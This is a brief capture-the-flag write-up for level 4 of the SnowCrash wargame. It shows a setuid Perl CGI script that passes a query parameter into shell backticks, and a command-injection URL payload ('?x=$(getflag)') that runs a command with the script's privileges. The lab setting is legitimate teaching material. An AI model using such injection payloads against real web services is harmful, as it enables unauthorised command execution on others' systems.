# Level04

- Here we have a perl script with root execution permissions
(that's the s in place of the x).
	```bash
	level04@SnowCrash:~$ ls -la
	total 16
	[...]
	-rwsr-sr-x  1 flag04  level04  152 Mar  5  2016 level04.pl
	[...]
	```
- There is an unconditional execution in there:
	```bash
	level04@SnowCrash:~$ cat level04.pl
	#!/usr/bin/perl
	# localhost:4747
	[...]
	  print `echo $y 2>&1`;
	[...]
	```
- It's running on the VM on port 4747. so we just need to pass something
to the x parameter since there is no verification.
- In the web browser enter: `http://<VM IP>:4747?x=$(getflag)`
